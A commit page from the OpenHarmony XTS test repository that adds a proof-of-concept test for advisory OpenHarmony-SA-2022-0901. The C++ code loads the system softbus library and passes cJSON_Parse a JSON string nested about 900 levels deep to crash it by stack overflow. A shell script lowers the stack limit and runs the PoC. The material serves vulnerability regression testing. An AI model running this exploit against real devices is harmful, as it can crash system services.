Skip to content
体验新版
项目
组织
正在加载...
登录
切换导航
打开侧边栏
OpenHarmony
Xts Acts
提交
554fa3d7
X
Xts Acts
项目概览
OpenHarmony
/
Xts Acts
1 年多 前同步成功
通知
9
Star
22
Fork
0
代码
文件
提交
分支
Tags
贡献者
分支图
Diff
Issue
0
列表
看板
标记
里程碑
合并请求
0
Wiki
0
Wiki
分析
仓库
DevOps
项目成员
Pages
X
Xts Acts
项目概览
项目概览
详情
发布
仓库
仓库
文件
提交
分支
标签
贡献者
分支图
比较
Issue
0
Issue
0
列表
看板
标记
里程碑
合并请求
0
合并请求
0
Pages
分析
分析
仓库分析
DevOps
Wiki
0
Wiki
成员
成员
收起侧边栏
关闭侧边栏
动态
分支图
创建新Issue
提交
Issue看板
提交
554fa3d7
编写于
3月 02, 2023
作者:
J
jingyu123412
浏览文件
操作
浏览文件
下载
电子邮件补丁
差异文件
提交OpenHarmony-SA-2022-0901动态测试用例
Signed-off-by:
N
jingyu123412
<
1565704822@qq.com
>
上级
73319548
变更
2
显示空白变更内容
内联
并排
Showing
2 changed file
with
37 addition
and
7 deletion
+37
-7
demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.cpp
...t/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.cpp
+37
-4
demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.sh
...st/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.sh
+0
-3
未找到文件。
demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.c
→
demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.c
pp
浏览文件 @
554fa3d7
...
...
@@ -13,12 +13,44 @@
* See the License for the specific language governing permissions and
* limitations under the License.
*/
// 编译时需要使用-l参数链接cjson共享库
#include <stdio.h>
#include <cjson/cJSON.h>
#include <dlfcn.h>
//#include <memory>
#include <stdio.h>
#include <unistd.h>
/* The cJSON structure: */
typedef
struct
cJSON
{
struct
cJSON
*
next
;
struct
cJSON
*
prev
;
struct
cJSON
*
child
;
int
type
;
char
*
valuestring
;
int
valueint
;
double
valuedouble
;
char
*
string
;
}
cJSON
;
int
main
()
{
void
*
handle
;
// 打开共享库libsoftbus_server.z.so
handle
=
dlopen
(
"/system/lib/libsoftbus_server.z.so"
,
RTLD_LAZY
);
if
(
!
handle
)
{
fprintf
(
stderr
,
"Error: %s
\n
"
,
dlerror
());
return
1
;
}
// 获取函数DisplayManager::GetInstance地址
typedef
cJSON
*
(
*
Func
)(
char
*
);
Func
cJSON_Parse
=
reinterpret_cast
<
Func
>
(
dlsym
(
handle
,
"cJSON_Parse"
));
if
(
cJSON_Parse
==
NULL
)
{
fprintf
(
stderr
,
"Error: %s
\n
"
,
dlerror
());
dlclose
(
handle
);
return
1
;
}
// 准备一个具有900层嵌套结构的json数据
char
*
json_string
=
"{
\"
a
\"
:[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]}"
;
...
...
@@ -32,7 +64,8 @@ int main()
}
// 返回值不为null,没有修复漏洞,应该收到signal 11段错误提示
printf
(
"OpenHarmony-SA-2022-0901 : vulnerable
\n
"
);
cJSON_Delete
(
root
);
//
cJSON_Delete(root);
return
0
;
}
demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.sh
浏览文件 @
554fa3d7
...
...
@@ -19,8 +19,5 @@
#或者也可以继续增加嵌套的层数,使栈溢出,每增加一层会多占用64B的栈空间
ulimit
-s
60
#设置LD_LIBARAY_PATH环境变量,指向cJSON的共享库文件存储位置
export
LD_LIBRARY_PATH
=
/data/local/tmp
#运行poc可执行程序
./poc
编辑
预览
Markdown
is supported
0%
请重试
或
添加新附件
.
添加附件
取消
You are about to add
0
people
to the discussion. Proceed with caution.
先完成此消息的编辑!
取消
想要评论请
注册
或
登录